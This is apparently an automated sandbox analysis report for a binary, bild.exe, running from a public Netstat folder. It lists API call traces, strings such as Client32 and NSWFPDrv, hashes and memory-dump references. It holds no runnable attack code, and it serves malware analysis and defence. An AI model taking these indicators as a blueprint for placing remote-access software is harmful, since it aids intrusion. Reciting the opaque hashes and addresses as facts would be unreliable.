                                                                                  • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                  • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                  • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                  APIs
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,AD96CFBE,75922EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                  • String ID: Client$DisableGeolocation
                                                                                  • API String ID: 3315423714-4166767992
                                                                                  • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                  • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                  • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                  • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                  APIs
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                    • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                    • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                    • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                    • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                  • TranslateMessage.USER32(?), ref: 110271F0
                                                                                  • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                  • String ID: Exit Msgloop, quit=%d
                                                                                  • API String ID: 3212272093-2210386016
                                                                                  • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                  • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                  • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                  • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 110173FD
                                                                                    • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(0000030C,000000FF), ref: 1101733C
                                                                                    • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                    • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                    • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                    • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(0000030C,000000FF), ref: 11017252
                                                                                    • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                    • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                    • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                  • SetEvent.KERNEL32(0000030C), ref: 1101741D
                                                                                  • GetTickCount.KERNEL32 ref: 11017423
                                                                                  Strings
                                                                                  • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                  • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                  • API String ID: 3804766296-4122679463
                                                                                  • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                  • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                  • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                  • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                  APIs
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                  • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleThread__wcstoi64
                                                                                  • String ID: *AutoICFConfig$Client
                                                                                  • API String ID: 3257255551-59951473
                                                                                  • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                  • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                  • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                  • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                                                  • String ID: Push
                                                                                  • API String ID: 1566154052-4278761818
                                                                                  • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                  • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                  • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                  • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                  APIs
                                                                                  • GetCommandLineA.KERNEL32 ref: 00261027
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0026107B
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00261096
                                                                                  • ExitProcess.KERNEL32 ref: 002610A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3888305638.0000000000261000.00000020.00000001.01000000.00000009.sdmp, Offset: 00260000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3888290603.0000000000260000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_260000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                  • String ID:
                                                                                  • API String ID: 2164999147-0
                                                                                  • Opcode ID: 213af5006eed2941cea62b3352f514b38caca6e7b94cef4765d521d244881c5a
                                                                                  • Instruction ID: 47e13cd6f740bc82e5fe16cc6be724b1b201411e58204b0b77fd98181f06d957
                                                                                  • Opcode Fuzzy Hash: 213af5006eed2941cea62b3352f514b38caca6e7b94cef4765d521d244881c5a
                                                                                  • Instruction Fuzzy Hash: D011D6204187C69AEF315F6089497FABFA59F22381F2C0044ECD697146D29668FBC7A5
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 1314093303-0
                                                                                  • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                  • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                  • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                  • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentFileModuleNameProcess
                                                                                  • String ID: C:\Users\Public\Netstat\bild.exe
                                                                                  • API String ID: 2251294070-3316297413
                                                                                  • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                  • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                  • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                  • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 1110F4A9
                                                                                    • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                    • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                    • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                  • _memset.LIBCMT ref: 1110F4D2
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                  • String ID: ..\ctl32\Refcount.cpp
                                                                                  • API String ID: 2803934178-2363596943
                                                                                  • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                  • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                  • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                  • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\NSWFPDrv
                                                                                  • API String ID: 3498533004-85019792
                                                                                  • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                  • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                  • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                  • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
